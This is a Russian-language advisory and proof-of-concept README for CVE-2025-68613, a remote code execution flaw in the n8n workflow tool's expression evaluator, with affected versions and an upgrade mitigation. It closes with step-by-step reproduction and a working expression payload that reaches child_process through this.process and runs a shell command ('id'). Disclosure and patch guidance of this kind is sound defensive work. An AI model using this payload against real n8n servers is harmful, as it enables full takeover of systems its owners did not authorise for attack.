
Proof-of-concept эксплойт для CVE-2025-68613 — критическая RCE в системе автоматизации рабочих процессов n8n. Демонстрирует выполнение произвольных команд через обход оценщика выражений в версиях до 1.122.0.
Оповещение безопасности: Критическая уязвимость удаленного выполнения кода в n8n (CVE-2025-68613)
В средстве автоматизации рабочих процессов n8n обнаружена критическая уязвимость, позволяющая выполнять произвольный код. Аутентифицированные пользователи с разрешениями на создание или редактирование рабочих процессов могут использовать эту ошибку для получения контроля над системой, на которой запущен экземпляр n8n. Сводка
| Идентификатор CVE | CVE-2025-68613 |
| Уязвимость | Неправильный контроль динамически управляемых ресурсов кода |
| Серьезность | Критическая |
| Воздействие | Выполнение произвольных команд, полный компрометация системы |
| Коренная причина | Оценщик выражений не очищает доступ к базовому объекту процесса Node.js (this.process), позволяя злоумышленнику подключать и использовать системные модули, такие как child_process. |
Воздействие
Злоумышленник, успешно эксплуатирующий эту уязвимость, может достичь следующего:
Затронутые и исправленные версии
| Статус | Версия(и) |
|---|---|
| Уязвимые | Все версии до 1.122.0 |
| Исправленные | Версия 1.122.0 и выше |
Смягчение
Крайне важно немедленно обновить ваш экземпляр n8n до версии 1.122.0 или более поздней, чтобы устранить эту уязвимость.
Детали эксплойта для CVE-2025-68613
Этот каталог содержит доказательство концепции уязвимости удаленного выполнения кода (RCE) в n8n (CVE-2025-68613). Требования
Шаги для воспроизведения
Создайте рабочий процесс:
Добавьте узлы:
Настройте узел «Set»:
result.Внедрение полезной нагрузки эксплойта:
result вставьте следующую полезную нагрузку:Эксплойт:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Выполнение и проверка:
id, что подтверждает выполнение кода.